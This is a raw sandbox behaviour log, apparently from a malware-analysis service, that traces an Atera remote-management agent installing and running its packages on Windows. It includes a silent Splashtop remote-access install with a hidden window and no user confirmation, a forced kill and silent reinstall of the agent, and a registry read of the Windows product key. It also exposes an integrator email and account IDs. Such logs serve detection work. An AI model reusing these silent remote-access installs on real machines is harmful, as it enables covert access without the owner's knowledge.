                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB 
$DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="contato@fazendadoscordeiros.com.br" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000p2oapiaz" /agentid="52187e48-563c-468d-9785-3542f81fb412"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -command " ################################################################################################ # windows 11 compatibility check script # ################################################################################################ # compatibility flag $iscompatible = $true # check if current os is windows 10 $osversion = (get-ciminstance -class win32_operatingsystem).caption if (-not $osversion.contains('windows 10')) { return } # architecture x64 $arch = (get-ciminstance -class cim_computersystem).systemtype $archvalue = 'x64-based pc' if ($arch -ne $archvalue) { $iscompatible = $false } # screen resolution $screeninfo = (get-ciminstance -classname win32_videocontroller).currentverticalresolution $valuemin = 720 if ($screeninfo -le $valuemin) { $iscompatible = $false } # cpu composition $core = (get-ciminstance -class cim_processor | select-object *).numberofcores $corevalue = 2 $frequency = (get-ciminstance -class cim_processor | select-object *).maxclockspeed $frequencyvalue = 1000 if (-not (($core -ge $corevalue) -and ($frequency -ge $frequencyvalue))) { $iscompatible = $false } # tpm $tpm2 = $false if ((get-tpm).manufacturerversionfull20) { $tpm2 = -not (get-tpm).manufacturerversionfull20.contains('not supported') } if ($tpm2 -contains $false) { $iscompatible = $false } # secure boot $secureboot = confirm-securebootuefi if ($secureboot -ne $true) { $iscompatible = $false } # ram available $memory = (get-ciminstance -class cim_computersystem).totalphysicalmemory $setminmemory = 4294967296 if ($memory -lt $setminmemory) { $iscompatible = $false } # storage available $listdisk = get-ciminstance -class win32_logicaldisk | where-object { $_.drivetype -eq '3' } $setminsizelimit = 64gb 
$diskcompatible = $false foreach ($disk in $listdisk) { if ($disk.freespace -ge $setminsizelimit) { $diskcompatible = $true } } if (-not $diskcompatible) { $iscompatible = $false } # output final result $iscompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kiiwiumvxdwvzdfblcm1pc3npb25pchrpb24iom51bgwsiljlcxvpcmvqyxnzd29yze9wdglvbii6bnvsbcwiugfzc3dvcmqiom51bgx9" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/production 443 or8ixli90mf "syncprofile" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagesystemtools\agentpackagesystemtools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/production 443 or8ixli90mf "probe" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/production 443 or8ixli90mf "monitor" 001q300000p2oapiaz
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E739C cpuid 35_2_00007FFDEE3E739C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
